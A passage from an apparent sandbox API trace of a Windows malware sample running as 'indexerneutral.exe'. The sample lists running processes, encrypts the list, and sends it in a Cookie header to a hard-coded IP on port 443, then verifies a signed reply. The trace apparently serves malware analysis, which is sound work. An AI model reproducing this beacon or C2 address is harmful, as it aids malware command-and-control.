th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0248.696] GetCurrentProcessId () returned 0x6cc [0248.696] GetCurrentProcessId () returned 0x6cc [0248.696] lstrcpyW (in: lpString1=0x5276f4, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0248.696] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x190, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0248.697] GetCurrentProcessId () returned 0x6cc [0248.697] GetCurrentProcessId () returned 0x6cc [0248.697] lstrcpyW (in: lpString1=0x52790c, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0248.697] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x188, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0248.697] GetCurrentProcessId () returned 0x6cc [0248.697] GetCurrentProcessId () returned 0x6cc [0248.697] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x188, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0248.698] GetCurrentProcessId () returned 0x6cc [0248.698] GetCurrentProcessId () returned 0x6cc [0248.698] lstrcpyW (in: lpString1=0x523b8c, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0248.698] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x190, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0248.698] GetCurrentProcessId () returned 0x6cc [0248.698] GetCurrentProcessId () returned 0x6cc [0248.698] lstrcpyW (in: lpString1=0x523da4, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0248.698] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x190, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0248.699] GetCurrentProcessId () returned 0x6cc [0248.699] GetCurrentProcessId () returned 0x6cc [0248.699] lstrcpyW (in: lpString1=0x523fbc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0248.699] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.700] GetCurrentProcessId () returned 0x6cc [0248.700] GetCurrentProcessId () returned 0x6cc [0248.700] lstrcpyW (in: lpString1=0x5241d4, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0248.700] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.700] GetCurrentProcessId () returned 0x6cc [0248.700] GetCurrentProcessId () returned 0x6cc [0248.700] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0248.701] GetCurrentProcessId () returned 0x6cc [0248.701] GetCurrentProcessId () returned 0x6cc [0248.701] lstrcpyW (in: lpString1=0x5243ec, lpString2="LogonUI.exe" | out: lpString1="LogonUI.exe") returned="LogonUI.exe" [0248.701] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0248.701] GetCurrentProcessId () returned 0x6cc [0248.701] GetCurrentProcessId () returned 0x6cc [0248.701] lstrcpyW (in: lpString1=0x524604, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0248.701] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.702] GetCurrentProcessId () returned 0x6cc [0248.702] GetCurrentProcessId () returned 0x6cc [0248.702] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.702] GetCurrentProcessId () returned 0x6cc [0248.702] GetCurrentProcessId () returned 0x6cc [0248.702] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.703] GetCurrentProcessId () returned 0x6cc [0248.703] GetCurrentProcessId () returned 0x6cc [0248.703] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.703] GetCurrentProcessId () returned 0x6cc [0248.703] GetCurrentProcessId () returned 0x6cc [0248.703] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x388, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.704] GetCurrentProcessId () returned 0x6cc [0248.704] GetCurrentProcessId () returned 0x6cc [0248.704] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.704] GetCurrentProcessId () returned 0x6cc [0248.704] GetCurrentProcessId () returned 0x6cc [0248.704] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x404, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0248.705] GetCurrentProcessId () returned 0x6cc [0248.705] GetCurrentProcessId () returned 0x6cc [0248.705] lstrcpyW (in: lpString1=0x52481c, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0248.705] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.705] GetCurrentProcessId () returned 0x6cc [0248.705] GetCurrentProcessId () returned 0x6cc [0248.705] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.706] GetCurrentProcessId () returned 0x6cc [0248.706] GetCurrentProcessId () returned 0x6cc [0248.706] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0248.706] GetCurrentProcessId () returned 0x6cc [0248.706] GetCurrentProcessId () returned 0x6cc [0248.706] lstrcpyW (in: lpString1=0x52e67c, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0248.706] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.707] GetCurrentProcessId () returned 0x6cc [0248.707] GetCurrentProcessId () returned 0x6cc [0248.707] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x500, pcPriClassBase=13, dwFlags=0x0, szExeFile="indexerneutral.exe")) returned 1 [0248.707] GetCurrentProcessId () returned 0x6cc [0248.707] Process32NextW (in: hSnapshot=0x378, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x500, pcPriClassBase=13, dwFlags=0x0, szExeFile="indexerneutral.exe")) returned 0 [0248.708] CloseHandle (hObject=0x378) returned 1 [0248.708] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0248.708] lstrlenW (lpString="spoolsv.exe") returned 11 [0248.708] lstrlenW (lpString="dwm.exe") returned 7 [0248.708] lstrlenW (lpString="LogonUI.exe") returned 11 [0248.708] lstrlenW (lpString="svchost.exe") returned 11 [0248.708] lstrlenW (lpString="lsass.exe") returned 9 [0248.708] lstrlenW (lpString="services.exe") returned 12 [0248.708] lstrlenW (lpString="winlogon.exe") returned 12 [0248.708] lstrlenW (lpString="wininit.exe") returned 11 [0248.708] lstrlenW (lpString="csrss.exe") returned 9 [0248.708] lstrlenW (lpString="smss.exe") returned 8 [0248.708] lstrcpyW (in: lpString1=0x5087c0, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0248.708] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0248.708] lstrcpyW (in: lpString1=0x5087ea, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0248.708] lstrlenW (lpString="spoolsv.exe") returned 11 [0248.708] lstrcpyW (in: lpString1=0x508802, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0248.708] lstrlenW (lpString="dwm.exe") returned 7 [0248.708] lstrcpyW (in: lpString1=0x508812, lpString2="LogonUI.exe" | out: lpString1="LogonUI.exe") returned="LogonUI.exe" [0248.708] lstrlenW (lpString="LogonUI.exe") returned 11 [0248.708] lstrcpyW (in: lpString1=0x50882a, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0248.708] lstrlenW (lpString="svchost.exe") returned 11 [0248.708] lstrcpyW (in: lpString1=0x508842, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0248.708] lstrlenW (lpString="lsass.exe") returned 9 [0248.708] lstrcpyW (in: lpString1=0x508856, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0248.708] lstrlenW (lpString="services.exe") returned 12 [0248.708] lstrcpyW (in: lpString1=0x508870, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0248.708] lstrlenW (lpString="winlogon.exe") returned 12 [0248.708] lstrcpyW (in: lpString1=0x50888a, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0248.708] lstrlenW (lpString="wininit.exe") returned 11 [0248.709] lstrcpyW (in: lpString1=0x5088a2, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0248.709] lstrlenW (lpString="csrss.exe") returned 9 [0248.709] lstrcpyW (in: lpString1=0x5088b6, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0248.709] lstrlenW (lpString="smss.exe") returned 8 [0248.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe,spoolsv.exe,dwm.exe,LogonUI.exe,svchost.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,", cchWideChar=132, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 132 [0248.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe,spoolsv.exe,dwm.exe,LogonUI.exe,svchost.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,", cchWideChar=132, lpMultiByteStr=0x5066b0, cbMultiByte=132, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe,spoolsv.exe,dwm.exe,LogonUI.exe,svchost.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,", lpUsedDefaultChar=0x0) returned 132 [0248.712] CryptDuplicateHash (in: hHash=0x4fd5a8, pdwReserved=0x0, dwFlags=0x0, phHash=0x19faec | out: phHash=0x19faec) returned 1 [0248.712] CryptEncrypt (in: hKey=0x4fd7e8, hHash=0x513a28, Final=1, dwFlags=0x0, pbData=0x52480c*, pdwDataLen=0x19fad4*=0xad, dwBufLen=0xb0 | out: pbData=0x52480c*, pdwDataLen=0x19fad4*=0xb0) returned 1 [0248.712] CryptExportKey (in: hKey=0x4fd7e8, hExpKey=0x4fdaa8, dwBlobType=0x1, dwFlags=0x40, pbData=0x19fa48, pdwDataLen=0x19fab4 | out: pbData=0x19fa48*, pdwDataLen=0x19fab4*=0x6c) returned 1 [0248.712] CryptGetHashParam (in: hHash=0x513a28, dwParam=0x2, pbData=0x5247f8, pdwDataLen=0x19fad0, dwFlags=0x0 | out: pbData=0x5247f8, pdwDataLen=0x19fad0) returned 1 [0248.712] CryptDestroyHash (hHash=0x513a28) returned 1 [0248.712] _snwprintf (in: _Dest=0x19fb00, _Count=0x40, _Format="%u.%u.%u.%u" | out: _Dest="41.57.104.182") returned 13 [0248.712] GetTickCount () returned 0x12efa [0248.712] _snwprintf (in: _Dest=0x52e678, _Count=0x1c8, _Format="Cookie: %u=" | out: _Dest="Cookie: 55437=") returned 14 [0248.712] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x19f6ac, cbSize=0x19faac | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0x19faac) returned 0x0 [0248.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6ac, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 151 [0248.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6ac, cbMultiByte=-1, lpWideCharStr=0x5248c8, cchWideChar=151 | out: lpWideCharStr="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)") returned 151 [0248.712] InternetOpenW (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0248.712] InternetConnectW (hInternet=0xcc0004, lpszServerName="41.57.104.182", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0248.712] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName=0x0, lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x844cc300, dwContext=0x0) returned 0xcc000c [0248.712] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Cookie: 55437=PutKZ7TbhnTUZtm3340Zgk6yneDl2gAVfTFJuPwx2f10sZlrMNgPbqY2Bx4JRSVWSTws5KZuhfwSnlo6lC187cDupGtLZo0xDSNEM6CSsWk2QhgqDMHkdNp/HKeUp8nCNtpHSXlx1DhczS7BuUeHIfSDaUHNP4YZaq7kNflKOm80WxgWHj0VLZ7Zc9lJp6oUH9cn1VsSv20SZTtHOc4ecv18y3W36bpd9FXGnF4AZOsOPsgbKxrZObYW1KsGR0ur5xz6XShZO/qFxoeh2uEkYCW5s7/tlfuOBBqVT5CDG5pGA7/I11AQoCwr77k0S4WAKyUcISQ1pHdj3scJdh8cWANWR8xcs+E4DY4Zq+2eSZrK16WsKuP7gS/2RluQx2uVxKTf/A==", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0249.503] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x19faa8, lpdwBufferLength=0x19faac, lpdwIndex=0x0 | out: lpBuffer=0x19faa8*, lpdwBufferLength=0x19faac*=0x4, lpdwIndex=0x0) returned 1 [0249.503] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000005, lpBuffer=0x19faac, lpdwBufferLength=0x19faa8, lpdwIndex=0x0 | out: lpBuffer=0x19faac*, lpdwBufferLength=0x19faa8*=0x4, lpdwIndex=0x0) returned 1 [0249.503] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x521778, dwNumberOfBytesToRead=0x94, lpdwNumberOfBytesRead=0x19faa8 | out: lpBuffer=0x521778*, lpdwNumberOfBytesRead=0x19faa8*=0x94) returned 1 [0249.503] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0249.504] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0249.504] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0249.504] CryptDuplicateHash (in: hHash=0x4fd5a8, pdwReserved=0x0, dwFlags=0x0, phHash=0x19fadc | out: phHash=0x19fadc) returned 1 [0249.504] CryptDecrypt (in: hKey=0x4fd7e8, hHash=0x5138a8, Final=1, dwFlags=0x0, pbData=0x524308, pdwDataLen=0x19fba4 | out: pbData=0x524308, pdwDataLen=0x19fba4) returned 1 [0249.504] CryptVerifySignatureW (hHash=0x5138a8, pbSignature=0x521778, dwSigLen=0x60, hPubKey=0x4fdaa8, szDescription=0x0, dwFlags=0x0) returned 1 [0249.504] CryptDestroyHash (hHash=0x5138a8) returned 1 [0249.506] WaitForSingleObject (hHandle=0x374, dwMilliseconds=0x0) returned 0x102 [0249.506] WaitForSingleObject (hHandle=0x370, dwMilliseconds=0x0) returned 0x102 [0249.507] WaitForSingleObject (hHandle=0x36c, dwMilliseconds=0x0) returned 0x102 [0249.507] WaitForSingleObject (hHandle=0x360, dwMilliseconds=0x0) returned 0x102 [0249.507] WaitForSingleObject (hHandle=0x35c, dwMilliseconds=0x0) returned 0x102 [0249.507] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x0) returned 0x102 [0249.507] WaitForSingleObject (hHandle=0x2a0, dwMilliseconds=0x0) returned 0x102 [0249.507] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0249.507] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0249.554] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0249.554] DispatchMessageW (lpMsg=0x19ff2c) returned 0x113dac6 [0249.554] GetTickCount () returned 0x13246 [0249.554] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0249.554] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0250.556] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0250.556] DispatchMessageW (lpMsg=0x19ff2c) returned 0x113deae [0250.556] GetTickCount () returned 0x1362e [0250.556] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0250.556] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0251.569] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0251.569] DispatchMessageW (lpMsg=0x19ff2c) returned 0x113e2a5 [0251.569] GetTickCount () returned 0x13a25 [0251.570] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0251.570] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0252.600] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0252.600] DispatchMessageW (lpMsg=0x19ff2c) returned 0x113e6ad [0252.600] GetTickCount () returned 0x13e2d [0252.601] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0252.601] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0253.816] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0253.816] DispatchMessageW (lpMsg=0x19ff2c) returned 0x113eb60 [0253.816] GetTickCount () returned 0x142e0 [0253.816] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0253.816] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0254.880] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0254.880] DispatchMessageW (lpMsg=0x19ff2c) returned 0x113ef86 [0254.880] GetTickCount () returned 0x14706 [0254.880] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0254.880] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0255.899] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0255.899] DispatchMessageW (lpMsg=0x19ff2c) returned 0x113f38e [0255.899] GetTickCount () returned 0x14b0e [0255.899] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0255.899] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0257.098] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0257.099] DispatchMessageW (lpMsg=0x19ff2c) returned 0x113f831 [0257.099] GetTickCount () returned 0x14fb1 [0257.099] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0257.099] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0258.095] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0258.095] DispatchMessageW (lpMsg=0x19ff2c) returned 0x113fc19 [0258.095] GetTickCount () returned 0x15399 [0258.095] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0258.095] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0259.132] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0259.132] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1140030 [0259.132] GetTickCount () returned 0x157b0 [0259.132] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0259.132] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0260.131] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0260.131] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1140418 [0260.132] GetTickCount () returned 0x15b98 [0260.132] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0260.132] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0261.132] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0261.132] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1140800 [0261.132] GetTickCount () returned 0x15f80 [0261.132] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0261.132] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0262.145] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0262.145] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1140bf8 [0262.145] GetTickCount () returned 0x16378 [0262.145] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0262.146] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0263.146] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0263.146] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1140fe0 [0263.146] GetTickCount () returned 0x16760 [0263.146] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0263.146] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0264.161] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0264.161] DispatchMessageW (lpMsg=0x19ff2c) returned 0x11413d7 [0264.161] GetTickCount () returned 0x16b57 [0264.161] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0264.161] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0265.455] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0265.455] DispatchMessageW (lpMsg=0x19ff2c) returned 0x11418d8 [0265.455] GetTickCount () returned 0x17058 [0265.455] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0265.455] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0266.843] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0266.843] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1141e47 [0266.844] GetTickCount () returned 0x175c7 [0266.844] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0266.844] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0267.835] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0267.835] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114222f [0267.835] GetTickCount () returned 0x179af [0267.835] 